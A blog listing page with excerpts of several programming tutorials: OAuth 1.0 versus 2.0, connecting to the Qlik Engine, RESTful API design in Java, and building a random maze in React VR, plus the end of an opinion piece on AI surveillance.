when multiple owners were in the same physical location at the same time and can read text from screenshots. Officers can even feed it photos of suspects to see if a picture of them show up on someone’s hard drive. China takes the surveillance biscuit and may show us a glimpse of the future There are 600 million mobile phone users in China, each producing a great deal of information about their users. China has a notorious record of human rights abuses and the ruling Communist Party takes a controlling interest (a board seat) in many of their largest technology companies, to ensure the work done is in the interest of the party as well as profitable for the corporate. As a result, China is on the front foot when it comes to both AI and surveillance technology. China’s surveillance tools could be a harbinger of the future in the Western world. Chinese cities will be run by a private company Alibaba, China’s equivalent of Amazon, already has control over the traffic lights in one Chinese city, Hangzhou. Alibaba is far from shy about it’s ambitions. It has 120,000 developers working on the problem and intends to commercialise and sell the data it gathers about citizens. The AI based product they’re using is called CityBrain. In the future, all Chinese cities could well all be run by AI from the Alibaba corporation the idea is to use this trial as a template for every city. The technology is likely to be placed in Kuala Lumpur next. In the areas under CityBrain’s control, traffic speeds have increased by 15% already. However, some of those observing the situation have expressed concerns not just about (the lack of) oversight on CityBrain’s current capabilities but the potential for future abuse. What to make of this incredible list of surveillance capabilities Facilities like Mapquest’s new mapping service are beguiling. They’re clever ideas which create a better works. Similar technology, however, behind the scenes, is being adopted by law enforcement bodies in an ever growing list of countries. Even for someone who understands cutting edge technology, the sum of those facilities may be surprising. Literally any aspect of your behaviour, from the way you walk, to your face, your heatmap and, of course, the contents of your phone and laptops can now be monitored. Law enforcement can access and review information feeds with Artificial Intelligence software, to process and summarise findings quickly. In some cases, this is being done without the need for a warrant. Concerningly, these advances seem to be coming without policy or, in many cases any form of oversight. We must change how we think about AI, urge AI founding fathers  
Read more
  • 0
  • 0
  • 25733

article-image-what-is-the-difference-between-oauth-1-0-and-2-0
Pavan Ramchandani
13 Jun 2018
11 min read
Save for later

What's the difference between OAuth 1.0 and OAuth 2.0?

Pavan Ramchandani
13 Jun 2018
11 min read
The OAuth protocol specifies a process for resource owners to authorize third-party applications in accessing their server resources without sharing their credentials. This tutorial will take you through understanding OAuth protocol and introduce you to the offerings of OAuth 2.0 in a practical manner. This article is an excerpt from a book written by Balachandar Bogunuva Mohanram, titled RESTful Java Web Services, Second Edition. Consider a scenario where Jane (the user of an application) wants to let an application access her private data, which is stored in a third-party service provider. Before OAuth 1.0 or other similar open source protocols, such as Google AuthSub and FlickrAuth, if Jane wanted to let a consumer service use her data stored on some third-party service provider, she would need to give her user credentials to the consumer service to access data from the third-party service via appropriate service calls. Instead of Jane passing her login information to multiple consumer applications, OAuth 1.0 solves this problem by letting the consumer applications request authorization from the service provider on Jane's behalf. Jane does not divulge her login information; authorization is granted by the service provider, where both her data and credentials are stored. The consumer application (or consumer service) only receives an authorization token that can be used to access data from the service provider. Note that the user (Jane) has full control of the transaction and can invalidate the authorization token at any time during the signup process, or even after the two services have been used together. The typical example used to explain OAuth 1.0 is that of a service provider that stores pictures on the web (let's call the service StorageInc) and a fictional consumer service that is a picture printing service (let's call the service PrintInc). On its own, PrintInc is a full-blown web service, but it does not offer picture storage; its business is only printing pictures. For convenience, PrintInc has created a web service that lets its users download their pictures from StorageInc for printing. This is what happens when a user (the resource owner) decides to use PrintInc (the client application) to print his/her images stored in StorageInc (the service provider): The user creates an account in PrintInc. Let's call the user Jane, to keep things simple. PrintInc asks whether Jane wants to use her pictures stored in StorageInc and presents a link to get the authorization to download her pictures (the protected resources). Jane is the resource owner here. Jane decides to let PrintInc connect to StorageInc on her behalf and clicks on the authorization link. Both PrintInc and StorageInc have implemented the OAuth protocol, so StorageInc asks Jane whether she wants to let PrintInc use her pictures. If she says yes, then StorageInc asks Jane to provide her username and password. Note, however, that her credentials are being used at StorageInc's site and PrintInc has no knowledge of her credentials. Once Jane provides her credentials, StorageInc passes PrintInc an authorization token, which is stored as a part of Jane's account on PrintInc. Now, we are back at PrintInc's web application, and Jane can now print any of her pictures stored in StorageInc's web service. Finally, every time Jane wants to print more pictures, all she needs to do is come back to PrintInc's website and download her pictures from StorageInc without providing the username and password again, as she has already authorized these two web services to exchange data on her behalf. The preceding example clearly portrays the authorization flow in OAuth 1.0 protocol. Before getting deeper into OAuth 1.0, here is a brief overview of the common terminologies and roles that we saw in this example: Client (consumer): This refers to an application (service) that tries to access a protected resource on behalf of the resource owner and with the resource owner's consent. A client can be a business service, mobile, web, or desktop application. In the previous example, PrintInc is the client application. Server (service provider): This refers to an HTTP server that understands the OAuth protocol. It accepts and responds to the requests authenticated with the OAuth protocol from various client applications (consumers). If you relate this with the previous example, StorageInc is the service provider. Protected resource: Protected resources are resources hosted on servers (the service providers) that are access-restricted. The server validates all incoming requests and grants access to the resource, as appropriate. Resource owner: This refers to an entity capable of granting access to a protected resource. Mostly, it refers to an end user who owns the protected resource. In the previous example, Jane is the resource owner. Consumer key and secret (client credentials): These two strings are used to identify and authenticate the client application (the consumer) making the request. Request token (temporary credentials): This is a temporary credential provided by the server when the resource owner authorizes the client application to use the resource. As the next step, the client will send this request token to the server to get authorized. On successful authorization, the server returns an access token. The access token is explained next. Access token (token credentials): The server returns an access token to the client when the client submits the temporary credentials obtained from the server during the resource grant approval by the user. The access token is a string that identifies a client that requests for protected resources. Once the access token is obtained, the client passes it along with each resource request to the server. The server can then verify the identity of the client by checking this access token. The following sequence diagram shows the interactions between the various parties involved in the OAuth 1.0 protocol: You can get more information about the OAuth 1.0 protocol here. What is OAuth 2.0? OAuth 2.0 is the latest release of the OAuth protocol, mainly focused on simplifying the client-side development. Note that OAuth 2.0 is a completely new protocol, and this release is not backwards-compatible with OAuth 1.0. It offers specific authorization flows for web applications, desktop applications, mobile phones, and living room devices. The following are some of the major improvements in OAuth 2.0, as compared to the previous release: The complexity involved in signing each request: OAuth 1.0 mandates that the client must generate a signature on every API call to the server resource using the token secret. On the receiving end, the server must regenerate the same signature, and the client will be given access only if both the signatures match. OAuth 2.0 requires neither the client nor the server to generate any signature for securing the messages. Security is enforced via the use of TLS/SSL (HTTPS) for all communication. Addressing non-browser client applications: Many features of OAuth 1.0 are designed by considering the way a web client application interacts with the inbound and outbound messages. This has proven to be inefficient while using it with non-browser clients such as on-device mobile applications. OAuth 2.0 addresses this issue by accommodating more authorization flows suitable for specific client needs that do not use any web UI, such as on-device (native) mobile applications or API services. This makes the protocol very flexible. The separation of roles: OAuth 2.0 clearly defines the roles for all parties involved in the communication, such as the client, resource owner, resource server, and authorization server. The specification is clear on which parts of the protocol are expected to be implemented by the resource owner, authorization server, and resource server. The short-lived access token: Unlike in the previous version, the access token in OAuth 2.0 can contain an expiration time, which improves the security and reduces the chances of illegal access. The refresh token: OAuth 2.0 offers a refresh token that can be used for getting a new access token on the expiry of the current one, without going through the entire authorization process again. Before we get into the details of OAuth 2.0, let's take a quick look at how OAuth 2.0 defines roles for each party involved in the authorization process. Though you might have seen similar roles while discussing OAuth 1.0 in last section, it does not clearly define which part of the protocol is expected to be implemented by each one: The resource owner: This refers to an entity capable of granting access to a protected resource. In a real-life scenario, this can be an end user who owns the resource. The resource server: This hosts the protected resources. The resource server validates and authorizes the incoming requests for the protected resource by contacting the authorization server. The client (consumer): This refers to an application that tries to access protected resources on behalf of the resource owner. It can be a business service, mobile, web, or desktop application. Authorization server: This, as the name suggests, is responsible for authorizing the client that needs access to a resource. After successful authentication, the access token is issued to the client by the authorization server. In a real-life scenario, the authorization server may be either the same as the resource server or a separate entity altogether. The OAuth 2.0 specification does not really enforce anything on this part. It would be interesting to learn how these entities talk with each other to complete the authorization flow. The following is a quick summary of the authorization flow in a typical OAuth 2.0 implementation: Let's understand the diagram in more detail: The client application requests authorization to access the protected resources from the resource owner (user). The client can either directly make the authorization request to the resource owner or via the authorization server by redirecting the resource owner to the authorization server endpoint. The resource owner authenticates and authorizes the resource access request from the client application and returns the authorization grant to the client. The authorization grant type returned by the resource owner depends on the type of client application that tries to access the OAuth protected resource. Note that the OAuth 2.0 protocol defines four types of grants in order to authorize access to protected resources. The client application requests an access token from the authorization server by passing the authorization grant along with other details for authentication, such as the client ID, client secret, and grant type. On successful authentication, the authorization server issues an access token (and, optionally, a refresh token) to the client application. The client application requests the protected resource (RESTful web API) from the resource server by presenting the access token for authentication. On successful authentication of the client request, the resource server returns the requested resource. The sequence of interaction that we just discussed is of a very high level. Depending upon the grant type used by the client, the details of the interaction may change. The following section will help you understand the basics of grant types. Understanding grant types in OAuth 2.0 Grant types in the OAuth 2.0 protocol are, in essence, different ways to authorize access to protected resources using different security credentials (for each type). The OAuth 2.0 protocol defines four types of grants, as listed here; each can be used in different scenarios, as appropriate: Authorization code: This is obtained from the authentication server instead of directly requesting it from the resource owner. In this case, the client directs the resource owner to the authorization server, which returns the authorization code to the client. This is very similar to OAuth 1.0, except that the cryptographic signing of messages is not required in OAuth 2.0. Implicit: This grant is a simplified version of the authorization code grant type flow. In the implicit grant flow, the client is issued an access token directly as the result of the resource owner's authorization. This is less secure, as the client is not authenticated. This is commonly used for client-side devices, such as mobile, where the client credentials cannot be stored securely. Resource owner password credentials: The resource owner's credentials, such as username and password, are used by the client for directly obtaining the access token during the authorization flow. The access code is used thereafter for accessing resources. This grant type is only used with trusted client applications. This is suitable for legacy applications that use the HTTP basic authentication to incrementally transition to OAuth 2.0. Client credentials: These are used directly for getting access tokens. This grant type is used when the client is also the resource owner. This is commonly used for embedded services and backend applications, where the client has an account (direct access rights). Read Next: Understanding OAuth Authentication methods - Tutorial OAuth 2.0 – Gaining Consent - Tutorial
Read more
  • 0
  • 0
  • 60068

article-image-create-connection-qlik-engine-tip
Amey Varangaonkar
13 Jun 2018
8 min read
Save for later

5 ways to create a connection to the Qlik Engine [Tip]

Amey Varangaonkar
13 Jun 2018
8 min read
With mashups or web apps, the Qlik Engine sits outside of your project and is not accessible and loaded by default. The first step before doing anything else is to create a connection with the Qlik Engine, after which you can continue to open a session and perform further actions on that app, such as: Opening a document/app Making selections Retrieving visualizations and apps For using the Qlik Engine API, open a WebSocket to the engine. There may be a difference in the way you do this, depending on whether you are working with Qlik Sense Enterprise or Qlik Sense Desktop. In this article, we will elaborate on how you can achieve a connection to the Qlik engine and the benefits of doing so. The following excerpt has been taken from the book Mastering Qlik Sense, authored by Martin Mahler and Juan Ignacio Vitantonio. Creating a connection To create a connection using WebSockets, you first need to establish a new web socket communication line. To open a WebSocket to the engine, use one of the following URIs: Qlik Sense Enterprise Qlik Sense Desktop wss://server.domain.com:4747/app/ or wss://server.domain.com[/virtual proxy]/app/ ws://localhost:4848/app Creating a Connection using WebSockets In the case of Qlik Sense Desktop, all you need to do is define a WebSocket variable, including its connection string in the following way: var ws = new WebSocket("ws://localhost:4848/app/"); Once the connection is opened and checking for ws.open(), you can call additional methods to the engine using ws.send(). This example will retrieve the number of available documents in my Qlik Sense Desktop environment, and append them to an HTML list: <html> <body> <ul id='docList'> </ul> </body> </html> <script> var ws = new WebSocket("ws://localhost:4848/app/"); var request = { "handle": -1, "method": "GetDocList", "params": {}, "outKey": -1, "id": 2 } ws.onopen = function(event){ ws.send(JSON.stringify(request)); // Receive the response ws.onmessage = function (event) { var response = JSON.parse(event.data); if(response.method != ' OnConnected'){ var docList = response.result.qDocList; var list = ''; docList.forEach(function(doc){ list += '<li>'+doc.qDocName+'</li>'; }) document.getElementById('docList').innerHTML = list; } } } </script> The preceding example will produce the following output on your browser if you have Qlik Sense Desktop running in the background: All Engine methods and calls can be tested in a user-friendly way by exploring the Qlik Engine in the Dev Hub. A single WebSocket connection can be associated with only one engine session (consisting of the app context, plus the user). If you need to work with multiple apps, you must open a separate WebSocket for each one. If you wish to create a WebSocket connection directly to an app, you can extend the configuration URL to include the application name, or in the case of the Qlik Sense Enterprise, the GUID. You can then use the method from the app class and any other classes as you continue to work with objects within the app. var ws = new WebSocket("ws://localhost:4848/app/MasteringQlikSense.qvf"); Creating  Connection to the Qlik Server Engine Connecting to the engine on a Qlik Sense environment is a little bit different as you will need to take care of authentication first. Authentication is handled in different ways, depending on how you have set up your server configuration, with the most common ones being: Ticketing Certificates Header authentication Authentication also depends on where the code that is interacting with the Qlik Engine is running. If your code is running on a trusted computer, authentication can be performed in several ways, depending on how your installation is configured and where the code is running: If you are running the code from a trusted computer, you can use certificates, which first need to be exported via the QMC If the code is running on a web browser, or certificates are not available, then you must authenticate via the virtual proxy of the server Creating a connection using certificates Certificates can be considered as a seal of trust, which allows you to communicate with the Qlik Engine directly with full permission. As such, only backend solutions ever have access to certificates, and you should guard how you distribute them carefully. To connect using certificates, you first need to export them via the QMC, which is a relatively easy thing to do: Once they are exported, you need to copy them to the folder where your project is located using the following code: <html> <body> <h1>Mastering QS</h1> </body> <script> var certPath = path.join('C:', 'ProgramData', 'Qlik', 'Sense', 'Repository', 'Exported Certificates', '.Local Certificates'); var certificates = { cert: fs.readFileSync(path.resolve(certPath, 'client.pem')), key: fs.readFileSync(path.resolve(certPath, 'client_key.pem')), root: fs.readFileSync(path.resolve(certPath, 'root.pem')) }; // Open a WebSocket using the engine port (rather than going through the proxy) var ws = new WebSocket('wss://server.domain.com:4747/app/', { ca: certificates.root, cert: certificates.cert, key: certificates.key, headers: { 'X-Qlik-User': 'UserDirectory=internal; UserId=sa_engine' } }); ws.onopen = function (event) { // Call your methods } </script> Creating a connection using the Mashup API Now, while connecting to the engine is a fundamental step to start interacting with Qlik, it's very low-level, connecting via WebSockets. For advanced use cases, the Mashup API is one way to help you get up to speed with a more developer-friendly abstraction layer. The Mashup API utilizes the qlik interface as an external interface to Qlik Sense, used for mashups and for including Qlik Sense objects in external web pages. To load the qlik module, you first need to ensure RequireJS is available in your main project file. You will then have to specify the URL of your Qlik Sense environment, as well as the prefix of the virtual proxy, if there is one: <html> <body> <h1>Mastering QS</h1> </body> </html> <script src="https://cdnjs.cloudflare.com/ajax/libs/require.js/2.3.5/require.min.js"> <script> //Prefix is used for when a virtual proxy is used with the browser. var prefix = window.location.pathname.substr( 0, window.location.pathname.toLowerCase().lastIndexOf( "/extensions" ) + 1 ); //Config for retrieving the qlik.js module from the Qlik Sense Server var config = { host: window.location.hostname, prefix: prefix, port: window.location.port, isSecure: window.location.protocol === "https:" }; require.config({ baseUrl: (config.isSecure ? "https://" : "http://" ) + config.host + (config.port ? ":" + config.port : "" ) + config.prefix + "resources" }); require(["js/qlik"], function (qlik) { qlik.setOnError( function (error) { console.log(error); }); //Open an App var app = qlik.openApp('MasteringQlikSense.qvf', config); </script> Once you have created the connection to an app, you can start leveraging the full API by conveniently creating HyperCubes, connecting to fields, passing selections, retrieving objects, and much more. The Mashup API is intended for browser-based projects where authentication is handled in the same way as if you were going to open Qlik Sense. If you wish to use the Mashup API, or some parts of it, with a backend solution, you need to take care of authentication first. Creating a connection using enigma.js Enigma is Qlik's open-source promise wrapper for the engine. You can use enigma directly when you're in the Mashup API, or you can load it as a separate module. When you are writing code from within the Mashup API, you can retrieve the correct schema directly from the list of available modules which are loaded together with qlik.js via 'autogenerated/qix/engine-api'.   The following example will connect to a Demo App using enigma.js: define(function () { return function () { require(['qlik','enigma','autogenerated/qix/engine-api'], function (qlik, enigma, schema) { //The base config with all details filled in var config = { schema: schema, appId: "My Demo App.qvf", session:{ host:"localhost", port: 4848, prefix: "", unsecure: true, }, } //Now that we have a config, use that to connect to the //QIX service. enigma.getService("qix" , config).then(function(qlik){ qlik.global.openApp(config.appId) //Open App qlik.global.openApp(config.appId).then(function(app){ //Create SessionObject for FieldList app.createSessionObject( { qFieldListDef: { qShowSystem: false, qShowHidden: false, qShowSrcTables: true, qShowSemantic: true, qShowDerivedFields: true }, qInfo: { qId: "FieldList", qType: "FieldList" } } ).then( function(list) { return list.getLayout(); } ).then( function(listLayout) { return listLayout.qFieldList.qItems; } ).then( function(fieldItems) { console.log(fieldItems) } ); }) } })}}) It's essential to also load the correct schema whenever you load enigma.js. The schema is a collection of the available API methods that can be utilized in each version of Qlik Sense. This means your schema needs to be in sync with your QS version. Thus, we see it is fairly easy to create a stable connection with the Qlik Engine API. If you liked the above excerpt, make sure you check out the book Mastering Qlik Sense to learn more tips and tricks on working with different kinds of data using Qlik Sense and extract useful business insights. How Qlik Sense is driving self-service Business Intelligence Overview of a Qlik Sense® Application’s Life Cycle What we learned from Qlik Qonnections 2018
Read more
  • 0
  • 0
  • 17925
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-design-a-restful-web-api-with-java-tutorial
Pavan Ramchandani
12 Jun 2018
12 min read
Save for later

Design a RESTful web API with Java [Tutorial]

Pavan Ramchandani
12 Jun 2018
12 min read
In today's tutorial, you will learn to design REST services. We will break down the key design considerations you need to make when building RESTful web APIs. In particular, we will focus on the core elements of the REST architecture style: Resources and their identifiers Interaction semantics for RESTful APIs (HTTP methods) Representation of resources Hypermedia controls This article is an excerpt from a book written by Balachandar Bogunuva Mohanram, titled RESTful Java Web Services, Second Edition. This book will help you build robust, scalable and secure RESTful web services, making use of the JAX-RS and Jersey framework extensions. Let's start by discussing the guidelines for identifying resources in a problem domain. Richardson Maturity Model—Leonardo Richardson has developed a model to help with assessing the compliance of a service to REST architecture style. The model defines four levels of maturity, starting from level-0 to level-3 as the highest maturity level. The maturity levels are decided considering the aforementioned principle elements of the REST architecture. Identifying resources in the problem domain The basic steps that yoneed to take while building a RESTful web API for a specific problem domain are: Identify all possible objects in the problem domain. This can be done by identifying all the key nouns in the problem domain. For example, if you are building an application to manage employees in a department, the obvious nouns are department and employee. The next step is to identify the objects that can be manipulated using CRUD operations. These objects can be classified as resources. Note that you should be careful while choosing resources. Based on the usage pattern, you can classify resources as top-level and nested resources (which are the children of a top-level resource). Also, there is no need to expose all resources for use by the client; expose only those resources that are required for implementing the business use case. Transforming operations to HTTP methods Once you have identified all resources, as the next step, you may want to map the operations defined on the resources to the appropriate HTTP methods. The most commonly used HTTP methods (verbs) in RESTful web APIs are POST, GET, PUT, and DELETE. Note that there is no one-to-one mapping between the CRUD operations defined on the resources and the HTTP methods. Understanding of idempotent and safe operation concepts will help with using the correct HTTP method. An operation is called idempotent if multiple identical requests produce the same result. Similarly, an idempotent RESTful web API will always produce the same result on the server irrespective of how many times the request is executed with the same parameters; however, the response may change between requests. An operation is called safe if it does not modify the state of the resources. Check out the following table: MethodIdempotentSafeGETYESYESOPTIONSYESYESHEADYESYESPOSTNONOPATCHNONOPUTYESNODELETEYESNO Here are some tips for identifying the most appropriate HTTP method for the operations that you want to perform on the resources: GET: You can use this method for reading a representation of a resource from the server. According to the HTTP specification, GET is a safe operation, which means that it is only intended for retrieving data, not for making any state changes. As this is an idempotent operation, multiple identical GET requests will behave in the same manner. A GET method can return the 200 OK HTTP response code on the successful retrieval of resources. If there is any error, it can return an appropriate status code such as 404 NOT FOUND or 400 BAD REQUEST. DELETE: You can use this method for deleting resources. On successful deletion, DELETE can return the 200 OK status code. According to the HTTP specification, DELETE is an idempotent operation. Note that when you call DELETE on the same resource for the second time, the server may return the 404 NOT FOUND status code since it was already deleted, which is different from the response for the first request. The change in response for the second call is perfectly valid here. However, multiple DELETE calls on the same resource produce the same result (state) on the server. PUT: According to the HTTP specification, this method is idempotent. When a client invokes the PUT method on a resource, the resource available at the given URL is completely replaced with the resource representation sent by the client. When a client uses the PUT request on a resource, it has to send all the available properties of the resource to the server, not just the partial data that was modified within the request. You can use PUT to create or update a resource if all attributes of the resource are available with the client. This makes sure that the server state does not change with multiple PUT requests. On the other hand, if you send partial resource content in a PUT request multiple times, there is a chance that some other clients might have updated some attributes that are not present in your request. In such cases, the server cannot guarantee that the state of the resource on the server will remain identical when the same request is repeated, which breaks the idempotency rule. POST: This method is not idempotent. This method enables you to use the POST method to create or update resources when you do not know all the available attributes of a resource. For example, consider a scenario where the identifier field for an entity resource is generated at the server when the entity is persisted in the data store. You can use the POST method for creating such resources as the client does not have an identifier attribute while issuing the request. Here is a simplified example that illustrates this scenario. In this example, the employeeID attribute is generated on the server: POST hrapp/api/employees HTTP/1.1 Host: packtpub.com {employee entity resource in JSON} On the successful creation of a resource, it is recommended to return the status of 201 Created and the location of the newly created resource. This allows the client to access the newly created resource later (with server-generated attributes). The sample response for the preceding example will look as follows: 201 Created Location: hrapp/api/employees/1001 Best practice Use caching only for idempotent and safe HTTP methods, as others have an impact on the state of the resources. Understanding the difference between PUT and POST A common question that you will encounter while designing a RESTful web API is when you should use the PUT and POST methods? Here's the simplified answer: You can use PUT for creating or updating a resource, when the client has the full resource content available. In this case, all values are with the client and the server does not generate a value for any of the fields. You will use POST for creating or updating a resource if the client has only partial resource content available. Note that you are losing the idempotency support with POST. An idempotent method means that you can call the same API multiple times without changing the state. This is not true for the POST method; each POST method call may result in a server state change. PUT is idempotent, and POST is not. If you have strong customer demands, you can support both methods and let the client choose the suitable one on the basis of the use case. Naming RESTful web resources Resources are a fundamental concept in RESTful web services. A resource represents an entity that is accessible via the URI that you provide. The URI, which refers to a resource (which is known as a RESTful web API), should have a logically meaningful name. Having meaningful names improves the intuitiveness of the APIs and, thereby, their usability. Some of the widely followed recommendations for naming resources are shown here: It is recommended you use nouns to name both resources and path segments that will appear in the resource URI. You should avoid using verbs for naming resources and resource path segments. Using nouns to name a resource improves the readability of the corresponding RESTful web API, particularly when you are planning to release the API over the internet for the general public. You should always use plural nouns to refer to a collection of resources. Make sure that you are not mixing up singular and plural nouns while forming the REST URIs. For instance, to get all departments, the resource URI must look like /departments. If you want to read a specific department from the collection, the URI becomes /departments/{id}. Following the convention, the URI for reading the details of the HR department identified by id=10 should look like /departments/10. The following table illustrates how you can map the HTTP methods (verbs) to the operations defined for the departments' resources: ResourceGETPOSTPUTDELETE/departmentsGet all departmentsCreate a new departmentBulk update on departmentsDelete all departments/departments/10Get the HR department with id=10Not allowedUpdate the HR departmentDelete the HR department While naming resources, use specific names over generic names. For instance, to read all programmers' details of a software firm, it is preferable to have a resource URI of the form /programmers (which tells about the type of resource), over the much generic form /employees. This improves the intuitiveness of the APIs by clearly communicating the type of resources that it deals with. Keep the resource names that appear in the URI in lowercase to improve the readability of the resulting resource URI. Resource names may include hyphens; avoid using underscores and other punctuation. If the entity resource is represented in the JSON format, field names used in the resource must conform to the following guidelines: Use meaningful names for the properties Follow the camel case naming convention: The first letter of the name is in lowercase, for example, departmentName The first character must be a letter, an underscore (_), or a dollar sign ($), and the subsequent characters can be letters, digits, underscores, and/or dollar signs Avoid using the reserved JavaScript keywords If a resource is related to another resource(s), use a subresource to refer to the child resource. You can use the path parameter in the URI to connect a subresource to its base resource. For instance, the resource URI path to get all employees belonging to the HR department (with id=10) will look like /departments/10/employees. To get the details of employee with id=200 in the HR department, you can use the following URI: /departments/10/employees/200. The resource path URI may contain plural nouns representing a collection of resources, followed by a singular resource identifier to return a specific resource item from the collection. This pattern can repeat in the URI, allowing you to drill down a collection for reading a specific item. For instance, the following URI represents an employee resource identified by id=200 within the HR department: /departments/hr/employees/200. Although the HTTP protocol does not place any limit on the length of the resource URI, it is recommended not to exceed 2,000 characters because of the restriction set by many popular browsers. Best practice: Avoid using actions or verbs in the URI as it refers to a resource. Using HATEOAS in response representation Hypertext as the Engine of Application State (HATEOAS) refers to the use of hypermedia links in the resource representations. This architectural style lets the clients dynamically navigate to the desired resource by traversing the hypermedia links present in the response body. There is no universally accepted single format for representing links between two resources in JSON. Hypertext Application Language The Hypertext API Language (HAL) is a promising proposal that sets the conventions for expressing hypermedia controls (such as links) with JSON or XML. Currently, this proposal is in the draft stage. It mainly describes two concepts for linking resources: Embedded resources: This concept provides a way to embed another resource within the current one. In the JSON format, you will use the _embedded attribute to indicate the embedded resource. Links: This concept provides links to associated resources. In the JSON format, you will use the _links attribute to link resources. Here is the link to this proposal: http://tools.ietf.org/html/draft-kelly-json-hal-06. It defines the following properties for each resource link: href: This property indicates the URI to the target resource representation template: This property would be true if the URI value for href has any PATH variable inside it (template) title: This property is used for labeling the URI hreflang: This property specifies the language for the target resource title: This property is used for documentation purposes name: This property is used for uniquely identifying a link The following example demonstrates how you can use the HAL format for describing the department resource containing hyperlinks to the associated employee resources. This example uses the JSON HAL for representing resources, which is represented using the application/hal+json media type: GET /departments/10 HTTP/1.1 Host: packtpub.com Accept: application/hal+json HTTP/1.1 200 OK Content-Type: application/hal+json { "_links": { "self": { "href": "/departments/10" }, "employees": { "href": "/departments/10/employees" }, "employee": { "href": "/employees/{id}", "templated": true } }, "_embedded": { "manager": { "_links": { "self": { "href": "/employees/1700" } }, "firstName": "Chinmay", "lastName": "Jobinesh", "employeeId": "1700", } }, "departmentId": 10, "departmentName": "Administration" } To summarize, we discussed the details of designing RESTful web APIs including identifying the resources, using HTTP methods, and naming the web resources. Additionally we got introduced to Hypertext application language. Read More: Getting started with Django RESTful Web Services Testing RESTful Web Services with Postman Documenting RESTful Java web services using Swagger
Read more
  • 0
  • 0
  • 44031

article-image-vr-experiences-with-react-vr-create-maze
Sunith Shetty
12 Jun 2018
16 min read
Save for later

Building VR experiences with React VR 2.0: How to create maze that's new every time you play

Sunith Shetty
12 Jun 2018
16 min read
In today’s tutorial, we will examine the functionality required to build a simple maze. There are a few ways we could build a maze. The most straightforward way would be to fire up our 3D modeler package (say, Blender) and create a labyrinth out of polygons. This would work fine and could be very detailed. However, it would also be very boring. Why? The first time we get through the maze will be exciting, but after a few tries, you'll know the way through. When we construct VR experiences, you usually want people to visit often and have fun every time. This tutorial is an excerpt from a book written by John Gwinner titled Getting Started with React VR. In this book, you will learn how to create amazing 360 and virtual reality content that runs directly in your browsers. A modeled labyrinth would be boring. Life is too short to do boring things. So, we want to generate a Maze randomly. This way, you can change the Maze every time so that it'll be fresh and different. The way to do that is through random numbers to ensure that the Maze doesn't shift around us, so we want to actually do it with pseudo-random numbers. To start doing that, we'll need a basic application created. Please go to your VR directory and create an application called 'WalkInAMaze': react-vr init WalkInAMaze Almost random–pseudo random number generators To have a chance of replaying value or being able to compare scores between people, we really need a pseudo-random number generator. The basic JavaScript Math.random() is not a pseudo-random generator; it really gives you a totally random number every time. We need a pseudo-random number generator that takes a seed value. If you give the same seed to the random number generator, it will generate the same sequence of random numbers. (They aren't completely random but are very close.) Random number generators are a complex topic; for example, they are used in cryptography, and if your random number generator isn't completely random, someone could break your code. We aren't so worried about that, we just want repeatability. Although the UI for this may be a bit beyond the scope of this book, creating the Maze in a way that clicking on Refresh won't generate a totally different Maze is really a good thing and will avoid frustration on the part of the user. This will also allow two users to compare scores; we could persist a board number for the Maze and show this. This may be out of scope for our book; however, having a predictable Maze will help immensely during development. If it wasn't for this, you might get lost while working on your world. (Well, probably not, but it makes testing easier.) Including library code from other projects Up to this point, I've shown you how to create components in React VR (or React). JavaScript interestingly has a historical issue with include. With C++, Java, or C#, you can include a file in another file or make a reference to a file in a project. After doing that, everything in those other files, such as functions, classes, and global properties (variables), are then usable from the file that you've issued the include statement in. With a browser, the concept of "including" JavaScript is a little different. With Node.js, we use package.json to indicate what packages we need. To bring those packages into our code, we will use the following syntax in your .js files: var MersenneTwister = require('mersenne-twister'); Then, instead of using Math.random(), we will create a new random number generator and pass a seed, as follows: var rng = new MersenneTwister(this.props.Seed); From this point on, you just call rng.random() instead of Math.random(). We can just use npm install <package> and the require statement for properly formatted packages. Much of this can be done for you by executing the npm command: npm install mersenne-twister --save Remember, the --save command to update our manifest in the project. While we are at it, we can install another package we'll need later: npm install react-vr-gaze-button --save Now that we have a good random number generator, let's use it to complicate our world. The Maze render() How do we build a Maze? I wanted to develop some code that dynamically generates the Maze; anyone could model it in a package, but a VR world should be living. Having code that can dynamically build Maze in any size (to a point) will allow a repeat playing of your world. There are a number of JavaScript packages out there for printing mazes. I took one that seemed to be everywhere, in the public domain, on GitHub and modified it for HTML. This app consists of two parts: Maze.html and makeMaze.JS. Neither is React, but it is JavaScript. It works fairly well, although the numbers don't really represent exactly how wide it is. First, I made sure that only one x was displaying, both vertically and horizontally. This will not print well (lines are usually taller than wide), but we are building a virtually real Maze, not a paper Maze. The Maze that we generate with the files at Maze.html (localhost:8081/vr/maze.html) and the JavaScript file—makeMaze.js—will now look like this: x1xxxxxxx x x x xxx x x x x x x x x xxxxx x x x x x x x x x x x x 2 xxxxxxxxx It is a little hard to read, but you can count the squares vs. xs. Don't worry, it's going to look a lot fancier. Now that we have the HTML version of a Maze working, we'll start building the hedges. This is a slightly larger piece of code than I expected, so I broke it into pieces and loaded the Maze object onto GitHub rather than pasting the entire code here, as it's long. You can find a link for the source at: http://bit.ly/VR_Chap11 Adding the floors and type checking One of the things that look odd with a 360 Pano background, as we've talked about before, is that you can seem to "float" against the ground. One fix, other than fixing the original image, is to simply add a floor. This is what we did with the Space Gallery, and it looks pretty good as we were assuming we were floating in space anyway. For this version, let's import a ground square. We could use a large square that would encompass the entire Maze; we'd then have to resize it if the size of the Maze changes. I decided to use a smaller cube and alter it so that it's "underneath" every cell of the Maze. This would allow us some leeway in the future to rotate the squares for worn paths, water traps, or whatever. To make the floor, we will use a simple cube object that I altered slightly and is UV mapped. I used Blender for this. We also import a Hedge model, and a Gem, which will represent where we can teleport to. Inside 'Maze.js' we added the following code: import Hedge from './Hedge.js'; import Floor from './Hedge.js'; import Gem from './Gem.js'; Then, inside the Maze.js we could instantiate our floor with the code: <Floor X={-2} Y={-4}/> Notice that we don't use 'vr/components/Hedge.js' when we do the import; we're inside Maze.js. However, in index.vr.js to include the Maze, we do need: import Maze from './vr/components/Maze.js'; It's slightly more complicated though. In our code, the Maze builds the data structures when props have changed; when moving, if the maze needs rendering again, it simply loops through the data structure and builds a collection (mazeHedges) with all of the floors, teleport targets, and hedges in it. Given this, to create the floors, the line in Maze.js is actually: mazeHedges.push(<Floor {...cellLoc} />); Here is where I ran into two big problems, and I'll show you what happened so that you can avoid these issues. Initially, I was bashing my head against the wall trying to figure out why my floors looked like hedges. This one is pretty easy—we imported Floor from the Hedge.js file. The floors will look 